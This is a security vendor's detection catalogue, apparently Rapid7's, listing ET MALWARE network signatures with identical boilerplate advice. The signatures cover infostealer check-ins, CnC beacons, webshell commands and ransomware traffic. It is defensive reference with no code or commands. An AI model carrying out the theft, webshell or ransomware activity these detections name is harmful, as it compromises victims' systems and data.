This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/NetShare User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Netwire Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Neverquest.InfoStealer Configuration Request CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Nolja Trojan Downloader Initial Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Nolja Trojan User-Agent (FileNolja)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Numnet.Downloader CnC Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Numnet.Downloader CnC Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Nutiliers.A Downloader CnC Checkin - Request Encrypted Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Nymaim Checkin (2)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Patchwork.Backdoor CnC Check-in M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Patchwork.Backdoor Communicating with CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Pgift.Backdoor APT CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/PointOfSales.Misc CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/PointOfSales.Misc CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Pterodo.CL CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Pterodo CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Qakbot Request for Compromised FTP Sites

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Qakbot Update Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32.Qakbot Webpage Infection Routine POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Quasar 1.3/Venom RAT Connectivity Check 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Renos.Downloader User Agent zeroup

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Rovnix Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Rshot.Backdoor File Upload CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Safe User Agent Fantasia

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Scar Downloader Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/SecVerif.Downloader Initial Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/SecVerif.Downloader Second Stage Download Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/ServStart.Variant CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Siggen.Dropper CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Skintrim CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Snojan.BNQKZQH CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Snojan.BNQKZQH User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/SPARS/ARS Stealer Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/SpeedingUpMyPC.Rootkit CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/SpeedingUpMyPC.Rootkit Install CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/SpeedingUpMyPC.Rootkit Successful Install GET Type CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Spy.KeyLogger.OCI CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/StartPage.eba Dropper Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/StealRat.SpamBot Email Template Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Symmi.46846 CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Symmi Remote File Injector Initial CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Syndicasec.Backdoor CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Taidoor.Backdoor CnC Checkin With Default Substitute MAC Address Field

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/TCYWin.Downloader User-Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Threebyte.APT Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Tobfy.Ransomware CnC Request - status.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE W32/Tobfy.Ransomware Invalid URI CnC Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE W32/TRCrypt.ULPM Downloader CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Trickbot C2 (networkDll module)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/TrojanSpy.MSIL Fetch Header CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/TrojanSpy.MSIL Fetch Time CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/TrojanSpy.MSIL Get New MAC CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/TrojanSpy.MSIL Set Done Day CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Trustezeb.C CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/UltimateDefender.FakeAV Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Upatre.Downloader Encoded Binary Download Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/VBS.SLoad.Backdoor Initial Base64 Encoded OK Server Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Virus-Encoder Ransomware Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE W32/VPEYE Trojan Downloader User-Agent (VP-EYE Downloader)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Vundo.Downloader Reporting User Website Session Information

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Wadolin.Downloader CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE W32/WannaCry.Ransomware Killswitch Domain HTTP Request 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE W32/Waterspout.APT Backdoor CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Witch.3FA0!tr CnC Actiivty

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Witch.3FA0!tr CnC Actiivty M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Witch.3FA0!tr CnC Activity M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Woai.Dropper Config Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Zbot.InfoStealer WindowsUpdate Connectivity Check With Opera UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Zbot.Variant CnC Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Zbot.Variant Fake MSIE 6.0 UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Zemra.DDoS.Bot Variant CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE W32/Zeus.BitcoinMiner Variant CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Resource Hijacking - T1496

ET MALWARE W32/Zeus.InfoStealer Infection Campaign Heap.exe Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Zeus.InfoStealer Infection Campaign Wav.exe Request

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE W32/Zzinfor.A Retrieving Instructions From CnC Server

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Waledac Beacon Traffic Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Waledac FACEPUNCH Traffic Detected

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WARP Win32/Barkiofork.A

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WaterDropX PRISM CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WaterDropX PRISM CnC Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WBK Download from dotted-quad Host

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WEBC2-CLOVER Download UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WEBC2-DIV UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WEBC2-RAVE UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WEBC2-UGX User-Agent (Windows+NT+5.x) APT1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Webshell Access with Known Password Inbound - Possibly Iran-based

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Server Software Component - T1505

ET MALWARE Webshell Execute Command Inbound - Possibly Iran-based M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Server Software Component - T1505

ET MALWARE Webshell Landing Outbound - Possibly Iran-based

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Server Software Component - T1505

ET MALWARE Webshell Upload Command Inbound - Possibly Iran-based

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Server Software Component - T1505

ET MALWARE Wide HTA with PowerShell Execution Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/44Caliber Stealer Discord Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/44Caliber Stealer Variant Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/7ev3n Ransomware Initial Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/7ev3n Ransomware Process Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Adware.Agent.NSU CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Agent.AAIB Variant CnC

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Agent.ACBD CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Agent.cyt (Or variant) HTTP POST Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Agent.pt User-Agent Detected

Description
Copy link

